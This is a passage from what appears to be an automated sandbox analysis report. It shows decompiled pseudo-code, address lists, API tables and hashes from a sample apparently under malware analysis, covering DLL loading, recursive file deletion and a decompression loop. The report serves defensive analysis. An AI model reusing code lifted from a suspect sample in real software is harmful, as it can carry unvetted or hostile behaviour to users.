						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E73BF16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E73BF13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E73BF16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E73BF13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E73BF13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E73BF13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E73BF12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E73BF13B1(_t90) * 4);
					goto L165;
				}
			}

0x73bf1c07
0x73bf1c0a
0x73bf1c0d
0x73bf1c10
0x73bf1c13
0x73bf1c16
0x73bf1c19
0x73bf1c1b
0x73bf1c1e
0x73bf1c21
0x73bf1c26
0x73bf1c29
0x73bf1c31
0x73bf1c39
0x73bf1c3b
0x73bf1c3e
0x73bf1c46
0x73bf1c46
0x73bf1c4b
0x73bf1c4e
0x00000000
0x00000000
0x73bf1c5b
0x73bf1c60
0x73bf1c62
0x73bf1cf4
0x73bf1cf4
0x73bf1cf4
0x73bf1cf8
0x73bf1cfb
0x73bf1cfd
0x73bf1d1f
0x73bf1d21
0x73bf1d24
0x73bf1d2d
0x73bf1d33
0x73bf1d35
0x73bf1d3b
0x73bf1d3b
0x73bf1d41
0x73bf1d44
0x73bf1d44
0x73bf1d47
0x73bf1d47
0x73bf1d4d
0x73bf1d4f
0x73bf1d4f
0x73bf1d51
0x73bf1d54
0x73bf1d57
0x73bf1d5d
0x73bf1d63
0x73bf1d66
0x73bf1d8a
0x73bf1d8d
0x00000000
0x00000000
0x73bf1d90
0x73bf1d92
0x73bf1da0
0x73bf1da3
0x73bf1da5
0x00000000
0x00000000
0x00000000
0x00000000
0x73bf1da7
0x73bf1da7
0x73bf1da7
0x73bf1dad
0x73bf1daf
0x00000000
0x00000000
0x73bf1db1
0x73bf1db3
0x73bf1db5
0x73bf1db7
0x00000000
0x00000000
0x00000000
0x73bf1db7
0x73bf1db9
0x73bf1dbb
0x73bf1dbd
0x73bf1dbd
0x73bf1dc3
0x73bf1dc9
0x73bf1dcb
0x73bf1ddf
0x73bf1ddf
0x73bf1de1
0x73bf1dcd
0x73bf1dd3
0x73bf1dd6
0x73bf1dd6
0x00000000
0x73bf1d68
0x73bf1d68
0x73bf1d68
0x73bf1d69
0x73bf1d71
0x73bf1d75
0x73bf1d7b
0x73bf1d7f
0x00000000
0x73bf1d7f
0x73bf1d6b
0x73bf1d6b
0x73bf1d6c
0x00000000
0x00000000
0x73bf1d6e
0x73bf1d6f
0x00000000
0x00000000
0x00000000
0x73bf1d6f
0x73bf1cff
0x73bf1d00
0x73bf1d09
0x73bf1d0c
0x73bf1d19
0x73bf1d19
0x73bf1d0e
0x73bf1d0e
0x73bf1de7
0x73bf1dea
0x73bf1dee
0x73bf1e61
0x73bf1e65
0x73bf1c43
0x00000000
0x73bf1c43
0x00000000
0x73bf1e65
0x73bf1cfd
0x73bf1c68
0x73bf1c6b
0x73bf1cce
0x73bf1cd1
0x73bf1ce3
0x73bf1ce3
0x73bf1ce6
0x73bf1df3
0x73bf1df6
0x73bf1df6
0x73bf1df8
0x73bf21ae
0x73bf21c6
0x73bf21c6
0x73bf21c9
0x00000000
0x00000000
0x73bf21b3
0x73bf21b4
0x73bf21b7
0x73bf21ba
0x73bf2244
0x73bf224b
0x73bf2251
0x73bf2255
0x73bf1e5c
0x73bf1e5d
0x73bf1e5d
0x73bf1e5e
0x00000000
0x73bf1e5e
0x73bf21c0
0x73bf21c3
0x73bf21c3
0x73bf21cb
0x73bf21ce
0x73bf2238
0x73bf1e51
0x73bf1e54
0x73bf1e57
0x73bf1e5a
0x73bf1e5a
0x00000000
0x73bf1e5a
0x73bf21d0
0x73bf21d3
0x73bf21da
0x73bf21da
0x73bf21dd
0x73bf21e1
0x73bf21f5
0x73bf21f5
0x73bf21f8
0x73bf21fc
0x00000000
0x00000000
0x73bf21fe
0x73bf2202
0x00000000
0x00000000
0x73bf2204
0x73bf220b
0x73bf220b
0x73bf2211
0x73bf2214
0x73bf2230
0x73bf2216
0x73bf221f
0x73bf2222
0x73bf2222
0x00000000
0x73bf2214
0x73bf21e3
0x73bf21e6
0x73bf21ea
0x00000000
0x00000000
0x73bf21ec
0x00000000
0x73bf21ec
0x73bf21d5
0x73bf21d8
0x00000000
0x00000000
0x00000000
0x73bf21d8
0x73bf1dfe
0x73bf1dfe
0x73bf1dff
0x73bf1f49
0x73bf1f49
0x73bf1f50
0x73bf1f53
0x00000000
0x00000000
0x73bf1f60
0x00000000
0x73bf214b
0x73bf214e
0x73bf2151
0x73bf2151
0x73bf2152
0x73bf2153
0x73bf2156
0x73bf2159
0x73bf215c
0x00000000
0x00000000
0x73bf215e
0x73bf215e
0x73bf2162
0x73bf217a
0x73bf217d
0x73bf2181
0x73bf2187
0x00000000
0x73bf2187
0x73bf2164
0x73bf2164
0x73bf2167
0x00000000
0x00000000
0x73bf2169
0x73bf216c
0x73bf216e
0x73bf216f
0x73bf216f
0x73bf216f
0x73bf2170
0x73bf2173
0x73bf2176
0x73bf2177
0x73bf2151
0x73bf2152
0x73bf2153
0x73bf2156
0x73bf2159
0x73bf215c
0x00000000
0x00000000
0x00000000
0x73bf215c
0x00000000
0x73bf1fa7
0x00000000
0x00000000
0x73bf1fb3
0x00000000
0x00000000
0x73bf1f9a
0x73bf1f9e
0x73bf1fa2
0x00000000
0x00000000
0x73bf211c
0x73bf2120
0x00000000
0x00000000
0x73bf2126
0x73bf212f
0x73bf2136
0x73bf213e
0x00000000
0x00000000
0x73bf2083
0x73bf2083
0x00000000
0x00000000
0x73bf1fbc
0x00000000
0x00000000
0x73bf21a6
0x00000000
0x00000000
0x73bf208b
0x73bf208d
0x73bf208d
0x00000000
0x00000000
0x73bf2196
0x00000000
0x00000000
0x73bf219a
0x00000000
0x00000000
0x73bf21a2
0x00000000
0x00000000
0x73bf20d3
0x73bf20d5
0x73bf20d5
0x00000000
0x00000000
0x73bf209d
0x73bf209f
0x73bf209f
0x00000000
0x00000000
0x73bf20af
0x73bf20b1
0x73bf20b1
0x00000000
0x00000000
0x73bf20e1
0x73bf20e3
0x73bf20e3
0x00000000
0x00000000
0x73bf20ba
0x73bf20bc
0x73bf20bc
0x00000000
0x00000000
0x73bf20c1
0x00000000
0x00000000
0x73bf219e
0x73bf21a8
0x73bf21a8
0x00000000
0x00000000
0x73bf20ec
0x73bf20f0
0x73bf20f5
0x73bf20f8
0x73bf20f9
0x73bf20fc
0x73bf2102
0x73bf2102
0x00000000
0x00000000
0x73bf218e
0x00000000
0x00000000
0x73bf20c5
0x73bf20c7
0x73bf20c7
0x00000000
0x00000000
0x73bf1fc3
0x73bf1fc3
0x00000000
0x00000000
0x73bf20da
0x73bf20dc
0x73bf20dc
0x00000000
0x00000000
0x73bf1f67
0x73bf1f6d
0x73bf1f70
0x73bf1f72
0x73bf1f72
0x73bf1f75
0x73bf1f79
0x73bf1f86
0x73bf1f88
0x73bf1f8e
0x73bf1f8e
0x73bf1f8e
0x00000000
0x00000000
0x73bf208e
0x73bf208e
0x73bf2090
0x73bf2097
0x00000000
0x00000000
0x73bf20d6
0x73bf20d6
0x00000000
0x00000000
0x73bf20a0
0x73bf20a0
0x73bf20a2
0x73bf20a9
0x00000000
0x00000000
0x73bf20b2
0x73bf20b2
0x73bf20b4
0x00000000
0x00000000
0x73bf20e4
0x73bf20e4
0x00000000
0x00000000
0x73bf20bd
0x73bf20bd
0x00000000
0x00000000
0x73bf210a
0x73bf210e
0x73bf2113
0x73bf2116
0x00000000
0x00000000
0x73bf20c8
0x73bf20c8
0x73bf20cb
0x73bf20cd
0x00000000
0x00000000
0x73bf20dd
0x73bf20dd
0x73bf20e6
0x73bf20e6
0x73bf1fc5
0x73bf1fc5
0x73bf1fc8
0x73bf1fcf
0x73bf1fd1
0x73bf1fd3
0x73bf1fda
0x73bf1fdd
0x73bf1fe2
0x73bf1fe4
0x73bf1fe6
0x73bf1fea
0x73bf1ff0
0x73bf1ff6
0x73bf1ff6
0x73bf1ff8
0x73bf1ff8
0x73bf1ff9
0x73bf1ff9
0x73bf1ffd
0x73bf2003
0x73bf2005
0x73bf2009
0x73bf200e
0x73bf200e
0x73bf2010
0x73bf2010
0x73bf2013
0x73bf2016
0x73bf201f
0x73bf2025
0x73bf2028
0x73bf2028
0x73bf202a
0x73bf202d
0x73bf2033
0x73bf2039
0x73bf2039
0x73bf203b
0x00000000
0x00000000
0x73bf2041
0x73bf2041
0x73bf2045
0x73bf204c
0x73bf2070
0x73bf2070
0x73bf2074
0x73bf2076
0x73bf2079
0x73bf2079
0x73bf207c
0x73bf207c
0x00000000
0x73bf2074
0x73bf2051
0x73bf2054
0x73bf2054
0x73bf205b
0x73bf205d
0x73bf2060
0x73bf2067
0x73bf2068
0x73bf206e
0x73bf206e
0x00000000
0x73bf206e
0x73bf2062
0x73bf2065
0x00000000
0x00000000
0x00000000
0x73bf2065
0x73bf1ff2
0x73bf1ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73bf1f60
0x73bf1e05
0x73bf1e05
0x73bf1e06
0x73bf1f46
0x00000000
0x73bf1f46
0x73bf1e0c
0x73bf1e0d
0x00000000
0x00000000
0x73bf1e13
0x73bf1e16
0x73bf1f0b
0x73bf1f0b
0x73bf1f0e
0x73bf1f23
0x73bf1f25
0x73bf1f25
0x73bf1f26
0x73bf1f29
0x73bf1f2c
0x73bf1f38
0x73bf1f38
0x73bf1f38
0x73bf1f2e
0x73bf1f2e
0x73bf1f2e
0x73bf1f3e
0x00000000
0x73bf1f3e
0x73bf1f10
0x73bf1f10
0x73bf1f11
0x73bf1f1f
0x00000000
0x73bf1f1f
0x73bf1f14
0x73bf1f15
0x00000000
0x00000000
0x73bf1f1b
0x00000000
0x73bf1f1b
0x73bf1e1c
0x73bf1f07
0x00000000
0x73bf1f07
0x73bf1e22
0x73bf1e22
0x73bf1e25
0x73bf1e4e
0x00000000
0x73bf1e4e
0x73bf1e27
0x73bf1e27
0x73bf1e2a
0x73bf1e44
0x00000000
0x73bf1e44
0x73bf1e2c
0x73bf1e2c
0x73bf1e2f
0x73bf1e3e
0x00000000
0x73bf1e3e
0x73bf1e32
0x73bf1e33
0x00000000
0x00000000
0x73bf1e35
0x00000000
0x73bf1cec
0x73bf1cec
0x73bf1cef
0x00000000
0x73bf1cef
0x73bf1ce6
0x73bf1cd3
0x73bf1cd8
0x00000000
0x00000000
0x73bf1cda
0x73bf1cdd
0x00000000
0x00000000
0x00000000
0x73bf1cdd
0x73bf1c6d
0x73bf1c70
0x73bf1ca6
0x73bf1ca9
0x00000000
0x73bf1caf
0x73bf1cb1
0x73bf1cb5
0x73bf1cbc
0x73bf1cc3
0x73bf1cc6
0x73bf1cc9
0x00000000
0x73bf1cc9
0x73bf1ca9
0x73bf1c72
0x73bf1c73
0x73bf1c8e
0x73bf1c91
0x00000000
0x73bf1c97
0x73bf1c97
0x73bf1c9e
0x73bf1ca1
0x00000000
0x73bf1ca1
0x73bf1c91
0x73bf1c78
0x00000000
0x73bf1c7e
0x73bf1c7e
0x73bf1c85
0x00000000
0x73bf1c85
0x73bf1c78
0x73bf1e74
0x73bf1e79
0x73bf1e7e
0x73bf1e82
0x73bf2355
0x73bf235b
0x73bf1e94
0x73bf1e96
0x73bf1e97
0x73bf227e
0x73bf227e
0x73bf2281
0x73bf2284
0x73bf22a1
0x73bf22a7
0x73bf22a9
0x73bf22af
0x73bf22c6
0x73bf22c6
0x73bf22c6
0x73bf22d3
0x73bf22d9
0x73bf22dc
0x73bf22e2
0x73bf22e4
0x73bf22e8
0x73bf22ea
0x73bf22f1
0x73bf22f6
0x73bf22f9
0x73bf22fb
0x73bf2300
0x73bf2312
0x73bf2312
0x73bf2300
0x73bf22f9
0x73bf22e8
0x73bf2318
0x73bf231b
0x73bf2325
0x73bf232d
0x73bf233a
0x73bf2340
0x73bf2343
0x73bf2273
0x73bf2273
0x00000000
0x73bf2273
0x73bf2349
0x73bf234f
0x73bf234f
0x00000000
0x00000000
0x73bf2351
0x73bf2351
0x73bf2351
0x73bf2351
0x00000000
0x73bf231d
0x73bf231d
0x73bf2323
0x00000000
0x00000000
0x00000000
0x73bf2323
0x73bf231b
0x73bf22b2
0x73bf22b8
0x73bf22ba
0x73bf22c0
0x00000000
0x00000000
0x00000000
0x73bf22c0
0x73bf2286
0x73bf228d
0x73bf2293
0x73bf2299
0x00000000
0x73bf2299
0x73bf1e9d
0x73bf1e9e
0x73bf225d
0x73bf225d
0x73bf2263
0x73bf2266
0x00000000
0x00000000
0x73bf226d
0x73bf2272
0x00000000
0x73bf2272
0x73bf1ea5
0x00000000
0x00000000
0x73bf1eab
0x73bf1eab
0x73bf1eb4
0x73bf1eb9
0x73bf1ebf
0x00000000
0x00000000
0x73bf1ec5
0x73bf1ed2
0x73bf1ed8
0x73bf1ee2
0x73bf1ee8
0x73bf1ef0
0x73bf1f00
0x00000000
0x73bf1f00

APIs

Part of subcall function 73BF12BB: GlobalAlloc.KERNELBASE(00000040,?,73BF12DB,?,73BF137F,00000019,73BF11CA,-000000A0), ref: 73BF12C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73BF1D2D
lstrcpyW.KERNEL32(00000008,?), ref: 73BF1D75
lstrcpyW.KERNEL32(00000808,?), ref: 73BF1D7F
GlobalFree.KERNEL32(00000000), ref: 73BF1D92
GlobalFree.KERNEL32(?), ref: 73BF1E74
GlobalFree.KERNEL32(?), ref: 73BF1E79
GlobalFree.KERNEL32(?), ref: 73BF1E7E
GlobalFree.KERNEL32(00000000), ref: 73BF2068
lstrcpyW.KERNEL32(?,?), ref: 73BF2222
GetModuleHandleW.KERNEL32(00000008), ref: 73BF22A1
LoadLibraryW.KERNEL32(00000008), ref: 73BF22B2
GetProcAddress.KERNEL32(?,?), ref: 73BF230C
lstrlenW.KERNEL32(00000808), ref: 73BF2326

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 3bb3658636f9dbecd5cc0a1e6cf049ed557f07f7a766d1255073aa1f6d544455
Instruction ID: 56e3db4159243b345d4fe81e9b8b9a29690f9700b4355119f29b6a1c0c3e56e8
Opcode Fuzzy Hash: 3bb3658636f9dbecd5cc0a1e6cf049ed557f07f7a766d1255073aa1f6d544455
Instruction Fuzzy Hash: 06229B79D0020BDFEB11DFA4C5807AEB7B4FF84315F14693AD166EA284E7709A89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405D9D
lstrcatW.KERNEL32 ref: 00405DE5
lstrcatW.KERNEL32 ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,7556D4C4,755513E0,00000000), ref: 00405E0E
FindFirstFileW.KERNELBASE(00425750,?,?,?,0040A014,?,00425750,?,?,7556D4C4,755513E0,00000000), ref: 00405E1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNEL32(00000000), ref: 00405ECD

Strings

., xrefs: 00405E43
PWB, xrefs: 00405DCD
\*.*, xrefs: 00405DDF
., xrefs: 00405E2F

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$PWB$\*.*
API String ID: 2035342205-2468439962
Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
